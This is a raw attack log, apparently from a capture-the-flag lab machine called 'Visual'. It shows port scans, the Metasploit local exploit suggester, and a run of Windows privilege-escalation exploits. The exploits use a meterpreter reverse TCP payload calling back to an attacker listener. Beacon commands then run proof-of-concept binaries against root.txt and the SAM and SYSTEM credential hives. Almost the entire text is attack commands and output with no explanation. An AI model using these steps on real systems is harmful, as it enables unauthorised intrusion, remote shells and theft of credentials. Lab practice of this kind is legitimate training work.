kali@kali ~/D/H/M/Visual> nmap -p- -n --min-rate 3000 -T4 10.10.11.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-25 23:44 CST
Nmap scan report for 10.10.11.234
Host is up (0.26s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 78.79 seconds

kali@kali ~/D/H/M/Visual> sudo nmap -Pn -p- -n --min-rate 3000 -T4 -sU 10.10.11.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-25 23:46 CST
Nmap scan report for 10.10.11.234
Host is up.
All 65535 scanned ports on 10.10.11.234 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 44.60 seconds
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.11.234 - Collecting local exploits for x64/windows...
[*] 10.10.11.234 - 189 exploit checks are being tried...
[+] 10.10.11.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.11.234 - Valid modules for session 2:
Privilege escalation attempts log
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on VISUAL via session ID: 2
[-] Exploit aborted due to failure: bad-config: Payload arch must match target arch
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set -g payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on VISUAL via session ID: 2
[*] Running Exploit on VISUAL
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > use exploit/windows/local/cve_2022_21882_win32k
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21882_win32k) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching msiexec to host the DLL...
[+] Process 1732 launched.
[*] Reflectively injecting the DLL into 1732...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2022_21882_win32k) > use exploit/windows/local/cve_2022_21999_spoolfool_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
winpeas attempt log

Possible vulnerabilities reported by winpeas
[?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
  [*] OS Version: 1809 (17763)
  [*] Enumerating installed KBs...
  [!] CVE-2019-0836 : VULNERABLE
   [>] https://exploit-db.com/exploits/46718
   [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
beacon> run C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe
[*] Tasked beacon to run: C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe
[+] host called home, sent: 79 bytes
[+] received output:
Base Path: C:\ProgramData\luafv_c9f12450-7f23-467a-a039-cab4009e1a9a
Trying to map C:\Windows\system32\license.rtf R/W
NtApiDotNet.NtException: (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.
   at NtApiDotNet.NtObjectUtils.ToNtException(NtStatus status, Boolean throw_on_error)
   at NtApiDotNet.NtFile.DoLinkRename(FileInformationClass file_info, String linkname, NtFile root, Boolean replace_if_exists)
   at NtApiDotNet.NtFile.CreateHardlink(String path, String linkname)
   at PoC_LUAFV_PostReadWriteCallback_EoP.Program.RemapFileAsRW()
   at PoC_LUAFV_PostReadWriteCallback_EoP.Program.Main(String[] args)
beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe
[+] host called home, sent: 57 bytes
[+] received output:
# Privileged DACL Overwrite EoP
# CVE: CVE-2019-0841
# Exploit Author: Nabeel Ahmed (@rogue_kdc)
# Tested on: Microsoft Windows 10 x32 & x64
# Category: Local
-------------------------------------------------
[+] Usage: exploit.exe <path to file to takeover>
[+] (E.g., exploit.exe C:\Windows\win.ini
-------------------------------------------------
beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[+] host called home, sent: 97 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\
[+] host called home, sent: 81 bytes
[+] received output:
[+] Something went wrong: No such file or directory

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[+] host called home, sent: 97 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam
[*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam
[+] host called home, sent: 88 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system
[*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system
[+] host called home, sent: 91 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...
beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\
[+] host called home, sent: 83 bytes
[+] received output:
[+] C:\Users\Administrator\ not found

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system
[+] host called home, sent: 93 bytes
[+] received output:
[+] C:\Windows\System32\config\system not found

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam
[+] host called home, sent: 90 bytes
[+] received output:
[+] C:\Windows\System32\config\sam not found
PS C:\Users\enox\Desktop> .\MsiExploit.exe C:\Users\Administrator\
.\MsiExploit.exe C:\Users\Administrator\
The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
This action is only valid for products that are currently installed.